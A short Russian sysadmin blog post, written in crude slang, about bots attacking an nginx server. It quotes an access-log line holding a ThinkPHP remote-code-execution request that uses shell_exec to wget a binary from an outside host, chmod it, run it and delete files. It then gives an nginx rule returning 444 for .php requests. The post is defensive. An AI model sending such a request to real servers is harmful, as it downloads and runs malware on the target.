November 14th, 2019

"Мамкины хакеры идут на хер"

Проблема:
Мамкины хакеры постоянно ломятся на сервер под управлением nginx и пытаются вызвать там говно, подобное:
GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget httd://pidary.gnoynye/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1" 400 157 "-" "Uirusu/2.0" "-"


Решение:
Добавить соответствующем месте conf файла следующие строки:

location ~* ^.*\.php.*$ {
return 444;
}

__